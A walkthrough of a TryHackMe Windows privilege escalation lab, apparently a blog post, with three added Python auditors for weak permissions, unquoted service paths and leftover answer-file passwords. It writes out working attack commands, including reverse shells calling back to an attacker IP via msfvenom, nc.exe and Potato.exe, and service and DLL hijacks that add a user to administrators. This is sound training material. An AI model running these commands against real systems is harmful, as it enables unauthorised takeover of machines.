
Windows Privilege Escalation without Metasploit

This post covers Windows privilege escalation tactics and techniques without using Metasploit 🙂

Before I start, I would like to thank the TryHackMe team and Mr. Heath Adams, also known as TheCyberMentor, for creating such a good machine.

You can access the machine below. It’s free and you will be awarded a Windows Priv Esc badge once you complete all the tasks.

TryHackMe | Windows PrivEsc Arena (tryhackme.com): Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are…

The attacking machine available on TryHackMe offers only RDP, so I created a payload using msfvenom to get an active session as the least privileged user.

This scenario mirrors a real engagement: you compromise a machine through a publicly available exploit, land a least-privileged user session, and then try to escalate to administrator rights.

To set up this environment, first create a payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp lhost=[kali machine IP] lport=443 -f exe -o access.exe

Now, transfer it to the target using smbserver and catch the reverse shell with Netcat.

Now that we have the least privileged user session, the system is ready to perform the attacks.

Let’s start one by one:

1. Registry Escalation — Autorun

First, copy accesschk64.exe to the system using smbserver, then run the command below:

accesschk64.exe -wvu "C:\Program Files\Autorun Program"

You will notice that Everyone has FILE_ALL_ACCESS to program.exe, which is an autorun program. This means program.exe can be replaced with a payload of the same name.

To exploit this, generate a payload using msfvenom and copy it to the C:\Program Files\Autorun Program folder.

Use Netcat to listen on port 443 and wait for an admin to log in. Once the admin has logged in, you will get the admin session.

2. Registry Escalation — AlwaysInstallElevated

Run the following commands:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

You will notice that the AlwaysInstallElevated value is set to 1 (it has to be 1 under both HKLM and HKCU to take effect), which lets any user install a Windows Installer package with elevated (SYSTEM) privileges.

Now generate an MSI payload using msfvenom and transfer it to a temp folder.

Listen on port 443 using Netcat and run the command:

msiexec /quiet /qn /i C:\Temp\setup.msi

You will get an administrator session.

3. Service Escalation — Registry

Run the following from cmd to execute a PowerShell command:

%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe "Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl"

You will notice that NT AUTHORITY\INTERACTIVE, which the user belongs to, has FullControl permission over the registry key.

Download windows_service.c from the sagishahar/scripts repository on GitHub (github.com, "Miscellaneous scripts and tools").

Edit the system command in the file and replace it with cmd.exe /k net localgroup administrators user /add

Install gcc-mingw-w64 with sudo apt install gcc-mingw-w64 and compile the C file with x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Transfer the x.exe using smbserver to a temp folder and run:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

sc start regsvc

You can see that the user has been added to the administrators group.

4. Service Escalation — Executable Files

First, copy accesschk64.exe to the system using smbserver, then run:

accesschk64.exe -wvu "C:\Program Files\File Permissions Service"

You will notice that Everyone has FILE_ALL_ACCESS permission on the filepermservice.exe file.

Now generate a payload named filepermservice.exe using msfvenom.

Transfer it using smbserver to the C:\Program Files\File Permissions Service folder and start the service with the command below:

sc start filepermsvc

Run Netcat on port 443 and you will get an administrator session.

5. Privilege Escalation — Startup Applications

Run the following command:

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

You will notice that BUILTIN\Users has full access (F) to the directory.

Now generate a payload using msfvenom and transfer it using smbserver to the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup folder.

Now wait for an admin to log in and you will get the administrator session.
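Sections 1, 4 and 5 all rest on the same misconfiguration: a group every user belongs to (Everyone, BUILTIN\Users, Authenticated Users) can write to a file or folder that a privileged process later executes. As an added example that is not part of the original post, the following Python auditor parses saved icacls output (a constructed sample is embedded) and flags such ACEs; the principal list and the set of write-capable rights are my own assumptions, extend them for your environment.

```python
import re

# Constructed icacls output for the Startup folder, in the format the post's
# icacls.exe command prints (not captured from the lab machine)
ICACLS_SAMPLE = r"""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F)
                                                             CREATOR OWNER:(OI)(CI)(IO)(F)
                                                             NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                                             BUILTIN\Administrators:(OI)(CI)(F)
                                                             Everyone:(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every local user is (or is very likely) a member of; an assumption
# made for this example, extend it for your environment
LOW_PRIV = {"everyone", r"builtin\users",
            r"nt authority\authenticated users", r"nt authority\interactive"}
# icacls rights that let content be changed, replaced or deleted
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DC", "WDAC", "WO"}

# One ACE per line, "<principal>:(flag)(flag)..." at the end of the line; the
# first line also carries the path, hence the anchor at $
ACE_RE = re.compile(
    r"((?:NT AUTHORITY|NT SERVICE|BUILTIN|CREATOR OWNER)(?:\\[\w .-]+)?"
    r"|Everyone|[\w.-]+\\[\w.-]+|[\w.-]+):((?:\([\w,]*\))+)\s*$")

def parse_icacls(output):
    """Return [(principal, [flags...])] for every ACE line in icacls output."""
    aces = []
    for line in output.splitlines():
        m = ACE_RE.search(line)
        if m:
            aces.append((m.group(1), re.findall(r"\(([^)]*)\)", m.group(2))))
    return aces

def weak_aces(output):
    """ACEs that let a low-privilege principal modify the object; deny ACEs
    are skipped and comma-joined rights such as (R,W) are split."""
    hits = []
    for principal, flags in parse_icacls(output):
        if "DENY" in flags or principal.lower() not in LOW_PRIV:
            continue
        granted = {r for f in flags for r in f.split(",")} & WRITE_RIGHTS
        if granted:
            hits.append((principal, sorted(granted)))
    return hits
```

Feed it the saved output of icacls against any path a privileged process executes from, such as the Autorun Program and File Permissions Service folders from sections 1 and 4.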

6. Service Escalation — DLL Hijacking

Download windows_dll.c from the sagishahar/scripts repository on GitHub (github.com, "Miscellaneous scripts and tools").

Edit windows_dll.c and set the command to cmd.exe /k net localgroup administrators user /add

Compile it with x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

Transfer hijackme.dll using smbserver to a temp folder and run:

sc stop dllsvc & sc start dllsvc

The user will be added to the administrators group.

7. Service Escalation — binPath

Transfer accesschk64.exe using smbserver and run the following command:

accesschk64.exe -accepteula -wuvc daclsvc

You will notice that the user User-PC\User has the SERVICE_CHANGE_CONFIG permission on the service.

Now stop the service before changing its binary path:

sc stop daclsvc
sc config daclsvc binpath= "C:\Users\user\Desktop\nc.exe 10.8.4.47 443 -e cmd.exe"

Now transfer nc.exe using smbserver and start the service; you will get an administrator session on Netcat listening on port 443.

8. Service Escalation — Unquoted Service Paths

Run the following command:

sc qc unquotedsvc

You will notice that the BINARY_PATH_NAME field shows a path that is not enclosed in quotes.

Now generate a payload using msfvenom (it calls nc.exe, so transfer nc.exe using smbserver as well):

msfvenom -p windows/exec CMD='C:\Users\user\Desktop\nc.exe 10.8.4.47 443 -e cmd.exe' -f exe-service -o common.exe

Transfer the payload using smbserver to the C:\Program Files\Unquoted Path Service folder.

Now start the service and you will get the administrator session on Netcat.
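The unquoted-path check can be automated and paired with its fix. This added Python example (not from the original post) parses sc qc output, enumerates the intermediate executables Windows would try before the real binary, which is exactly the set of directories a defender must confirm are not writable by ordinary users, and emits the sc config command that quotes the path; the embedded sample output and service path are constructed.

```python
import re

# Constructed "sc qc unquotedsvc" output in the layout the command prints; the
# path is an assumed one, not copied from the lab machine
SC_QC_SAMPLE = r"""SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        DISPLAY_NAME       : Unquoted Path Service
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(output):
    """Return (service_name, binary_path_name) from 'sc qc' output."""
    name = re.search(r"SERVICE_NAME:\s*(\S+)", output).group(1)
    path = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", output).group(1).strip()
    return name, path

def split_exe_args(binary_path):
    """Split a BINARY_PATH_NAME into (executable, arguments) at the first '.exe'."""
    m = re.search(r"\.exe", binary_path, re.IGNORECASE)
    return (binary_path[:m.end()], binary_path[m.end():]) if m else (binary_path, "")

def hijack_candidates(binary_path):
    r"""Executables Windows would try before the real one when the path is
    unquoted: for 'C:\a b\c d.exe' that is 'C:\a.exe', then 'C:\a b\c.exe'.
    An empty list means the path is quoted or has no spaces (not affected)."""
    exe, _ = split_exe_args(binary_path.strip())
    if exe.startswith('"') or " " not in exe:
        return []
    tokens = exe.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]

def audit_service(output):
    """Audit one service; if affected, also return the sc command that quotes the path."""
    name, path = parse_sc_qc(output)
    candidates = hijack_candidates(path)
    fix = None
    if candidates:
        exe, args = split_exe_args(path)
        # with arguments present, the inner quotes must be escaped for sc.exe
        fix = (f'sc config {name} binPath= "{exe}"' if not args
               else f'sc config {name} binPath= "\\"{exe}\\"{args}"')
    return {"service": name, "vulnerable": bool(candidates),
            "candidates": candidates, "fix": fix}
```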

9. Potato Escalation — Hot Potato

Transfer nc.exe, potato.exe, Nhttp.dll and Sharpcifs.dll using smbserver.

Run the following command:

Potato.exe -ip 10.10.175.206 -disable_exhaust true -cmd "C:\Users\user\Desktop\nc.exe 10.8.4.47 443 -e cmd.exe"

Here the -ip value is the victim machine's IP address.

Now listen with Netcat on port 443 and wait. You will get an administrator session.

10. Password Mining Escalation — Configuration Files

Open C:\Windows\Panther\Unattend.xml in cmd using the following command:

type C:\Windows\Panther\Unattend.xml

Decode the base64 value with echo -n "cGFzc3dvcmQxMjM=" | base64 -d

and you will get the admin password in cleartext.
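Leftover answer files are worth auditing on every golden image, not just this lab box. As an added Python example (not from the original post), here is a scanner for the Unattend.xml layout that reports every credential Windows Setup did not scrub, decoding base64 values the way Windows writes them; the embedded fragment is constructed and reuses the base64 value quoted above.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed answer-file fragment in the layout of C:\Windows\Panther\Unattend.xml;
# the base64 value is the one quoted in the post, the second block is a scrubbed one.
UNATTEND_SAMPLE = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>cGFzc3dvcmQxMjM=</Value><PlainText>false</PlainText></Password>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>*SENSITIVE*DATA*DELETED*</Value><PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

NS = "{urn:schemas-microsoft-com:unattend}"
SCRUBBED = "*SENSITIVE*DATA*DELETED*"   # marker Windows Setup writes when it clears a value

def decode_value(value, plaintext, tag):
    """Recover the credential. Encoded values are base64, normally of UTF-16LE text
    with the element name appended (the lab file uses plain ASCII without it)."""
    if plaintext:
        return value
    raw = base64.b64decode(value)
    text = raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("utf-8")
    return text[:-len(tag)] if text.endswith(tag) else text

def find_credentials(xml_text):
    """List every password left in an answer file as (element, username, password)."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    found = []
    for tag in ("Password", "AdministratorPassword"):
        for node in root.iter(NS + tag):
            value = (node.findtext(NS + "Value") or "").strip()
            if not value or value == SCRUBBED:
                continue   # empty or already scrubbed, nothing recoverable
            plaintext = (node.findtext(NS + "PlainText") or "true").strip().lower() == "true"
            user = ("Administrator" if tag == "AdministratorPassword"
                    else (parent_of[node].findtext(NS + "Username") or "").strip())
            found.append((tag, user, decode_value(value, plaintext, tag)))
    return found
```

A non-empty result means the file still carries a usable credential and should be removed from the image.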

I hope you find this post helpful, especially if you are planning the OSCP in the near future.

Author: https://medium.com/@sushantkamble/windows-privilege-escalation-without-metasploit-9bad5fbb5666
